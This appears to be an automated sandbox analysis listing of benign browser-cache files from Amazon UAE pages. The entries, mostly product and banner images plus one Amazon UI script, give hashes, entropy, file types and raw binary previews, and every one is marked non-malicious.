                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_outdoors_silver/xcm_banners_mena_440x400_coop_6col_phl-cosmoplast_440x400_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................J..............................!."1.#2AQ..q..$BRa..%3...CSs...&(49DEVb.....................................F.........................!1.A..Q.."aq.2.......$3BRr..#Cb....%..4Sc..............?..C...1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....0(.H..fK."".D..PQT.."...\...x.e.Su....zB7.4..U.".../.U.y.7..kr.....I.y......n{/.....Z.J.M.E.....mk._TjQ6.-.u:...h.SP.%... ..KL..<.....s..8..I'.9.@..8[..e..a[`i...e...ZT...L.......{c..........H..*..J..i.A.N..Mb#.P..$gJ|.r...-.t..c:.a..R.d.c..C.........T%........_
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):56755
                                                                                                                                                                                                                                                                      Entropy (8bit):7.973406642815217
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:VtMKW43ZIHxIlLasEzXjw4jGeDZbToj4Aig1Ct5Er:NWqORyLdEzz9Qj4Aig0bEr
                                                                                                                                                                                                                                                                      MD5:BE236EBEF7B0090BFFCF31A5181B1BAF
                                                                                                                                                                                                                                                                      SHA1:0F52B2342A6236339EFAA5A98DCD061884CF9C91
                                                                                                                                                                                                                                                                      SHA-256:338A305336D450EEEB81068B22C7A34FF69B43732EB2EDF0EDD6549F12A21416
                                                                                                                                                                                                                                                                      SHA-512:FAC9572E8F750BFE0F3985CBF0290E1D5F16505ECEB1F977A1313B9B9D217A8DB7CFA21EB3FC0AABE5D3BF2F76C947B5CD8FA8384AD4A62247467B1A97249970
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986211_UAE_Budget_Store_AE_xsite_baby_essentials_en_400x400_2X._CB644457596_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................;...................................................................................[a.....]...p.6.[..}G.z.+......k..i\..cV...............>`..`....{/X.s.4..p....*...[...&....q..p..........:4.....+i.y.q........+l.lJ....cnp.z.*..........~..N...B6B..k........*..2w.[..a..............h.....'"................6...........?.&[.......>...........+R.... 6o.......D=..ho.[....................Jf,m...=.W.:#.5.#..|.....y5...........h..{..........0.............vK.v[.~S.C..,.s_.@5....."...D9.............c..K........0....w.......Z.07.]........'2...............?.~.]\.eXj......f..X.......ML.;M.@..(.ivc#.{..............@...xx......>3...V..|.Z3..Q.F...B.'.~.i.}..0........a./...........;|5....f.^.f.}..u.(..i....G...&"..e....S.+.....;.&=s.n_o0.._L..".~...........x..u.P..-f..=ssV...{.R..!r}...?.P.}..E.l~L.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 392x90, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4736
                                                                                                                                                                                                                                                                      Entropy (8bit):7.95242931081788
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:wREimuNuaqF1DPyEJtml4viwMIFxKC1l+MEP5A5WN3vdrA59G/My7gAQu:DixNdqP7/Jsl4xfKCiMI5yWRhAS/MbAn
                                                                                                                                                                                                                                                                      MD5:2E99682AB0B9785ECFEDC4274F8FF4BA
                                                                                                                                                                                                                                                                      SHA1:A466B0FBC4979016D4F5B98575A54C44AC71517A
                                                                                                                                                                                                                                                                      SHA-256:F0A6A25B9317FB1CCDE1AE579721FE670D31BFA592F4E55D93811A3025579440
                                                                                                                                                                                                                                                                      SHA-512:38FE766300FD14F749ABC00DE9D7F1A329652F39FB60F26668952E9B50FCDD9F61B2E93F9DADA4B6A839057BFB1E13276C561973F24AF9276E0493058F866F84
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:RIFFx...WEBPVP8 l...0M...*..Z.>...A.yW...8.....o...=.W..".....f...~....59..z..?...?........O...w..._p..o............7....................@..........z.~........#....g.?.o.......?.~........G.w.....~E....z..s..|I}8.g......]....K.../...q...............9.../...<1?....5.'.O...~....c..............c...O.c.w.L..BB.Zi...?t..'.p..pl...u.z...iD..?%.y.....-.......I]...t..f.....C.|.../6.XT.en...2...`KP.p.@C... ..-f..?.....#....2+.o..h.......N.y..A.bd4yf)Y....M.`S......>.".6.....{*s......D&65.9.6n*k....*.l...;..v@..MlEh.wT.-G..+OU....?G.H..f..W........u.+.,.R...6...].~%.J\..H5.-..G`.....3.Q.....6.>..X...zK...w...v?....CLZD...y....|.5..-...Y...`......~...-Qjm.L).....C...M.F2......;.*R.2..=x..^0.FJ...g}.{g...F.0{U.."....}X..6...B.P....b.T;.W..N}...</.!.G..h.o....4..&..jR.Q.=h_[.@..g..MU...m=..#wz-qc?.!.......@..8...M.-.v.e8D.H.g.,y.........~j...yD.....H.e4..C........D."G5.......R.6"..9..I5....H!{1.....Wp..........n...e...k.._.Kz..B.(....\.,e...dD.VI.L..I
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 160x158, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):7852
                                                                                                                                                                                                                                                                      Entropy (8bit):7.971033565120233
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:fA1aO2/12w5wU661bNTRnMYqPFQdiUcS4BCd4qvE:nOQI61pT6Yqi1nynx
                                                                                                                                                                                                                                                                      MD5:0D3EB209910C55C33D5593E41F9D558A
                                                                                                                                                                                                                                                                      SHA1:12BBB720BAE675BCC2666721BECCFF2F069F5E1D
                                                                                                                                                                                                                                                                      SHA-256:C2C1F7916546978EDBDCCCB65D987EAB35F16E0D2BB83E1FD6DDC5FB231E0EDF
                                                                                                                                                                                                                                                                      SHA-512:0F4E18EEFEF7EA89F4EDB5DB4A95C85C34F5BB322843708EE669688C0FE182EB5C26C3B71392FC1970C814862812ECDE7F003D1CDA42E40C2E64EEEEC468E417
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81BY-cAOlCL._AC_QL95_SX160_SY600_FMwebp_.jpg
                                                                                                                                                                                                                                                                      Preview:RIFF....WEBPVP8 .....b...*....>...A.]U..8...1.o_....u...?...wG.?...9XMWJ.O....................o~..>.?.. ...i.o......}b................|..#........./.O..V|\z..O...O.."./...A.....'....._.>c.w.!.O...}B.!.]...S......^.....w.??........._..{..'.......'....d...H....._p.`?.?......).............G..................w.....?....r.........?...g.....0....#.W;R[..Py.Y.65.a..O.Ln.).).(........y."..cP....T.Dp......ta.w. %.Q..Y..x.w.....(....e..I..g.!8...;.q..Fe.VS'}".L.....j.i.....oM.ft.g...........sz.gt,..`e....)+...E.UOX..*.S%..?(.....i...~..(x.........:..=....k.F.K..|i.....(........~...\,.lS......2...j......K...t...B.g..._...r..w..1]........_C....l.....Q..........\.>..)ui.p...-..k6.I.0.".2".Q...v...m...O..R.n.,..XMx.(..K.9E5.......u.....Y(......:.=...D......LW.{.i....JDbOenz.*.Q..|..o....e..........)..x.s.........^=......;|z...!...|W....g.~X{\.d.;...$..YS+C%..}F......lBE.....5.%...V.......c..=l.a...E5....u.0.G.].{9.....E4.Y7~..|..W.L.....g..vU..M+..E..R....6f.7../..^.f
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x289, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):17223
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9395705595830774
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:+4DkgtA8TiFmFRrUqONNZboz2plIrQbmT2YA3:9puiFlUtjQYIMbmT2J3
                                                                                                                                                                                                                                                                      MD5:3BEE6CEA05BDB6D7F3DDB78598D53688
                                                                                                                                                                                                                                                                      SHA1:19CC4AAD34315C15FAF0EA2826419988848C8DE8
                                                                                                                                                                                                                                                                      SHA-256:B8F3CCC1CEB00FFE6CE4B60EDF2AFE2DB39DCF0D618B1A5411033D0B9E7D524E
                                                                                                                                                                                                                                                                      SHA-512:9AA09440466AAEECC70A7A290B16D5FC4DC75672BDD31F88DC0B33C037E018FB2DDE3A6E61CF03A1BF51F0042F1B18E23ABC0F41C7BEB9F08860BD3DA28E5150
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/612U6nbJBCL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......!.@.."..........6...................................................................X.............X.+E..9.2.+`............{..-2j.B*J.t.C...G ...........fQJ.,..~..=...V.-Wa1...Y.-.ofX. .........5...Yw<............0.q<....y.......c+[.q.\x..........v....^....{Yz.F@..~.v~y.Z.}1.O.......3..p.*..3...5..InF.{.s...^......5..I[.=%..G.....4...h.;..lW..4.W<}...u....<.+N...&........((X..........................#HoH....l.t..I.y........bz@......y..'..a5t|3...o.j.F.y.^v......n0..w}4...S.|O../=z>..2...<m.sM..|...P}..Qz1_.......:.c]a............TnW...W.d.v.......i..yR...f.k...\...Q}.....GH.0.........:.7.:..}Q..N[c..e......0q-...b.e..h.|.h.|.p.?d.-V........vE.Zc.n....b...&S.'./.../..7B.g....3.`{.m.#...=_..Wo/...2EP.t........J..!.........x:..b.....Z..K.n.m.qiw8u..B../F.v....7...|...7.~.42..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 97x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3938
                                                                                                                                                                                                                                                                      Entropy (8bit):7.8921822067052325
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TrVkQRN9dRUQvapGSIcNpJ8hGmv17Ih5DkWPEeC/wltse3:9kQTRUQvap0crJmGs7Ih5TtlOi
                                                                                                                                                                                                                                                                      MD5:48A43AFC99C47B4C5D7941A19CABA07F
                                                                                                                                                                                                                                                                      SHA1:EDF41FBBDC539290E5ACED172E4801DE9047EA79
                                                                                                                                                                                                                                                                      SHA-256:BB4EABC2654E2BACB5FDB17C8ECA29C160E95626A3B83D835802B3F3867962F1
                                                                                                                                                                                                                                                                      SHA-512:05C9E982025B238F3BE23E08060E64624174B29F433C3CFE3ABB15AF50EDE9AF38A3D3AA937406E4129183AA36B5AA50D7AAF0CBB22148079D749D733328D1A1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........a.."..............................................................!.1Q."Aaqs.....#$4r....%5bcdt...&2RSu...3BCETe.............................................1Q.A.!.2..B............?..B..B._..YBZym...[^..l.2.T..Y`.....X.Y7.y^.V..'./.{EL...6.#s..4..g.U.c..wD.PY9.%......#...."8q..+l...).q..`.o..hq+.....C.A.i\Ky....\N.4.. .2..!-.d"g.B.........b...\....m'>X[..cL]3..Z}i=m.r.Y.S...:T.S.X.U...".DU+d..@[{..\M.8....t.......g..8.Jz...s~...#<.....X.F.4B...Xy.b..1.R..HZ/.1w.Vh..A$..c..X.G.BN..$...~.......yN..:.3..@..._...JV...'a...... +.s"..&a.t..v..lHJ.U....XG..W.]...4..-...]@.h....vb.M+......IV`c.&.&...@ ..zt....+f...8?[...2#..q.>.S.p.!N..b... ...-.Bo...H......>.'..K....w..d..1.M..9..Zqb.X.|.E. .....9J'..=v..D..m..f..^B.*..0.R..I..[M>.(.M..]J.2l..eH{.I....P....RZ....q*>()..6 j#.".........W"S...E.~Z.*..".m...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5277
                                                                                                                                                                                                                                                                      Entropy (8bit):7.558803189279202
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:1rSnj8M9fnlVeJOTBaNqZSna+2uKwVeJuz4B7BGn8RMf0obn:1unjNfl00t5ZeCluzC7A8K0ob
                                                                                                                                                                                                                                                                      MD5:F5A6B216DCC08A367016DB19181D09D6
                                                                                                                                                                                                                                                                      SHA1:CE69C7B2058A06DF2C0EFEDF643CB146275B7A02
                                                                                                                                                                                                                                                                      SHA-256:EB635F458669BD7B3BB687B0547F4117B58C5EACE724B5E47B3F15DAC0DBE81C
                                                                                                                                                                                                                                                                      SHA-512:6F244E95DFFE5041E6D4E6F0B1C0AF662EE04215E43A056CED959751BAE600A62F60EA07B9A35A2B8875C84C2216C16864EC34EF5A7A9338BE20B2C0FBE55A5F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Desktop-Price-header-1500x80.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."................................................p.................................................p.........;...p.c...............7...........)..0{...~{...sW.C........n..=>.D............o...........uW...+~.)..r......X.....GV...>QM.5..;-............8...........!.-'q.h..X.......;'.S.Z*..Q..k"...6..........7............=..X.^~.....Kb........B.uU.W]..$.1.......................-z......X............p..........................................................................................................Aa..........m..J.s...........+X[........................................................................@......7G...G.X.....9.....c.-..6Y\#)..6.....:..........S..k4.Z.................s...$..........................`....0p ...........d.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.y...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):27817
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9732938800306
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:VFW1Q8f2vLC+bxNXlrZthmqRd3iCfPui92a8uR0dddK90:VFW17f2vLC+5XhmXCXyv
                                                                                                                                                                                                                                                                      MD5:704C3B654EDFDECA32D1E7722DB2DE28
                                                                                                                                                                                                                                                                      SHA1:2B75C2A6D0D7796F294344C1E7F741C0E83A253C
                                                                                                                                                                                                                                                                      SHA-256:9B573782971618B07E8BA20DE8F72C9A80A1B33D3A99068C1F9EFE09BEC99B83
                                                                                                                                                                                                                                                                      SHA-512:70E1862098315A45FE3902D0BEB61AB9C35FEE71C300527F76D450C3FA221AB19E3FE307200B24D86BFD34026E1E5122C00F0EBE859DFA775D5960A61B28B4A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71R7KNGuPAL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.@.."..........6.....................................................................<..X|)uJ."..T!..qq.2..]0&SeX.........@..................[c+I.....;..h.<..ZsZ.....@.<.....!.~..................;]..5.l+........m..1..v.."r.:....Z;.,Q..I.>.5..{.................Fl......2.....7..[..\.D@.P.....4/..Zl...d.].=$..............OS.1..d.:L.mh...d(F.y8..X.)......bD....[.o:C...".c....G...h....R....nb.1.@..........%.V.h.V.6.M.DY.j....S.q.M.u...o..%..Q.e&....q.f.Z.z.4.x.s..t.....u7...}..7.L.BV.W>.W...........=Q....m1.!......._.z..^>t..^..f..J..:./.v.#aU;B..YamJ..>Y1uep.l..U....qU...2`..s....$...zo..jP.X..{..;..k..=.@'..d..`....JX=..b]{2..M.e.4.0......W..h..W.r.T.XO.&.fSK.....uz/.65>...Eo.z.+m"..... .L...O.hp]f.]....=..U...T).}Dr..-...i->....>.gdp..z...a.S.HcB..^...x.)...".t..g.N.....>.......F.Y..G\.hn.Y.Y.O
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (609)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):26743
                                                                                                                                                                                                                                                                      Entropy (8bit):5.347138627237308
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:f1It/R8qLTNor9iviwO2AMVdnjnTzyFVBIXO6ZkLvnP7w2VxLQ/E2pNeHmnqjUYR:acmgkJVd/zMV56ZkLvxVx8fXoKA
                                                                                                                                                                                                                                                                      MD5:ABC38D8868C37FAF892916C89A4E5FBC
                                                                                                                                                                                                                                                                      SHA1:469738064CD0AEABAE8B4DAA2B679B587310134A
                                                                                                                                                                                                                                                                      SHA-256:FA8ED1F8E3AE60AB5AE81058050107B99A2AE4E5A34192BBAE3E41D35EC2693F
                                                                                                                                                                                                                                                                      SHA-512:158840D371AF384897DC3E11E2634F35FEFC895756A31CD4CFAE91325561EFF5CAF5CD4F125A16642BCD2AE6D5073467BF5390B63704A3DC84ED8525FB84C4BC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/11y85pohsPL._RC%7C41JZmnaIUdL.js_.js?AUIClients/AmazonGatewayAuiAssets
                                                                                                                                                                                                                                                                      Preview:(function(e){var k=window.AmazonUIPageJS||window.P,l=k._namespace||k.attributeErrors,f=l?l("AmazonHomepageCardAssets",""):k;f.guardFatal?f.guardFatal(e)(f,window):f.execute(function(){e(f,window)})})(function(e,k,l){e.register("gw-video-orchestrator",function(){function f(a,b,g){return 0<a?Math.min(g-a,b-a):0<b?Math.min(b,g):0}function n(a){var b=k.innerHeight||document.documentElement.clientHeight,g=k.innerWidth||document.documentElement.clientWidth;a=a.getBoundingClientRect();var b=f(a.top,a.bottom,.b),g=f(a.left,a.right,g),c=0;if(0<b||0<g)c=b*g;return Math.min(1,Math.max(0,c/((a.bottom-a.top)*(a.right-a.left))))}function p(a,b){return a&&1===a.nodeType&&(a.offsetWidth||a.offsetHeight||a.getClientRects().length)?n(a)<b?!1:!0:!1}function m(a){a=q(a);a!==c&&(c&&c.callback(!1),(c=a)&&"hidden"!==document.visibilityState&&c.callback(!0))}function q(a){if(a)for(var b=d.length;b--;)if(d[b].element===a)return d[b]}function r(a,b){return b.priority-a.priority||n(b.element)-n(a.element)||(a.el
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:V:V
                                                                                                                                                                                                                                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:0
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 440x350, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):33831
                                                                                                                                                                                                                                                                      Entropy (8bit):7.972780140530749
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:9SOtZxpgZPmsNlcdYDREdRh7T2TiKgXREi+SK16u1RAXuJJ:9SOxKZ52dRh7T2WFQmqAXA
                                                                                                                                                                                                                                                                      MD5:78C6C6EFA8C7AEF0F2DA4AA3E5601D62
                                                                                                                                                                                                                                                                      SHA1:DB5152ADF8D3C770C2349CD29C5CE57A486009EC
                                                                                                                                                                                                                                                                      SHA-256:CE95006330B0047059B5AB0787ED6A323D86D8D366580D176B3E7EA8D4594AC2
                                                                                                                                                                                                                                                                      SHA-512:EAAB9DDC4881078E68B2C722F7B1B2878B37ECBE4AD75080456E84B9FE37377267A4A921C8E06E3212F4D3585A3AA6B9CBEA07E49B10FD17220E8E79BAA0C33E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/store/furniture/Garden_outdoor/New_L2/XCM_Manual_1270036_BAU_AE_OHL_L2_NavTiles_Potsartificialplants_440x350_En_dd09951f-ada5-4ace-8645-0ad8b3ca87ee.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C............................................!!$$!!0///06666666666...C............................."......". ... .%%""%%//,//6666666666......^....".......................................T........................!1.AQ.."aq2...#B......3Rbr...S....$%Cs....&56DTct....4..7...............................5.......................!1QAR.....23aq".......Br.#Sb............?...Gi..w.w.Y8z.\=.$.Pt,..I=k..P.F.n.o..!.LLk!N...|(....+g6G,..9..#...`O_=...4..;lz.O..D..F6...t!]A.n..&.....S..jN.F.=.........s....z...Z.(.C.....).s...h..:..1.R.'Mcr}9{.\...I.:P..y..E..r.....e......~A...#...N.S.AB%.9H.h...I...>.:..e...@.O....$0.}.]:EH.tI..........y.g.B.ok]u...@PP..b.....?TH.v...,.zu.I.". L.J...*h..k...)QB9n.H$.3..ZP<.......Q...G..=@..z..fM ..=...R.:......X"6.`...M4....}z.YI0..JP..]..X........_.....J.Ti..A?....1..88d.. .....D..A..4..j..........A...3...._...............0N.."...aGK..5r........o..................F..eo1..]).G..:K...1....I.s..Dy...\...L.=.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):2879
                                                                                                                                                                                                                                                                      Entropy (8bit):7.84869020928119
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0rSwGRZE+uy+60RskHbD0nHftIC38TSz8rWJYJmJZXZFV06Cp1l5Q1aoJLASo4:TsGDE+s6YbD0nqzTwH6JmJZp3fC7lUp7
                                                                                                                                                                                                                                                                      MD5:59843D94DB955D9F79A7795A4D5F4E9E
                                                                                                                                                                                                                                                                      SHA1:EE36D09FBF049023BBB8BA166CCE803C7D28DB18
                                                                                                                                                                                                                                                                      SHA-256:39AF25E367EA661C64A284977B00021421925FDB168268883C51CE0F04732BC1
                                                                                                                                                                                                                                                                      SHA-512:91EF428F678B211169C99DF8FB2454F37993537587FDCABC1C6A2433B4C4394FD94D4BA425F9D6F1FC97E67F83234331C1228502BA09E34729337C2EB6FFB0D4
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!.1."AQ..q23Bab...#R...S.................................................1..!"Aa............?....(..(..(..y...@k...y.E.`w.E......K..[T.... ..H.e.....i.{..?............F......z.".l.t.{w.O..y..JH.u..................5....Ksr.8...........Y.Jt.\..O#l.#..r..$j....TO.u.uk.&......~K.q.;"...5..<x|......].\.w.y....F..'[.a/)...................l~..E.ku*f5$A.y....vf?N{.B.Oe.......Y.....c.8...k|jwVV.V...j......d..tl..............m.......4....s..+.......{5X/..lz...o....."^........}....].........uu.X.8l..#.}.W.....{.8.5..V....P...Y..L...f..5.%)J.)J.)J.)J.EV/..Eo.....,!.....>.?......xi.f.8y...H. {.!.z.U.G.V.u..YL.-...x].....B3R#..k.E..L...Q@ER....*..l.y.;.w/.I!.6`......9..GP].....p..=...#?..7.k\..5....]I0.(`b.pe..fX.}.M....N.+....4.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):17809
                                                                                                                                                                                                                                                                      Entropy (8bit):7.912706966602261
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:M413rWIYz/GIVwtzmiBaB8jhXFqzx6zBxME0Ed7E:D3rnYz/GogxaqdXmEC
                                                                                                                                                                                                                                                                      MD5:3B973AC986F14EC719CDD85094BC4943
                                                                                                                                                                                                                                                                      SHA1:0DF16D9B3CC6D2F31DE49E82E741C2EA6F081BC5
                                                                                                                                                                                                                                                                      SHA-256:D13CF72D1683FCBF148635B1C9875D563005EE26143CA56FB8C74A392C7CA3F4
                                                                                                                                                                                                                                                                      SHA-512:A90D8F459F2FCF2898386863FFE8031E5EA604938E1BEA072FB46EC9871F779A857D484A9DF0ECD95F70242F14AB9EA6D2C130759409D381256225787FE2EEE5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."........../.............................................................................................................-.......W2......................;:!.c.Udf)Q..Jk.1..+..b>.}......o.C.h...yc8.....AsZ.t5...t....F.............<......>.}.....0....l{,5V..F.}...t.r.........T.|..d.g.N..}................3..C....]b.x........i.I..n..h..............[)..5.2.....m....$....9m.~.gM.;.................v....}...O..m2.;4...J..`.0......).....7..................A../...gX..zY...&C........Ir..%ES.?....T}.......e..:...............nt...v.R..o0....b.Ex...zNN1*l.`..i>.n....V.l..................O2.^....I.)....0....G..]......O@..................8........]..K.B<....w.....Yq..w..".......^Y.w....Q...}.>..............na.p...;.....w.x....Q.....[..~&2j,z3-..i..n.u+.z./.vW.9g.z..s...............MX..').......C=..D7*...K
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
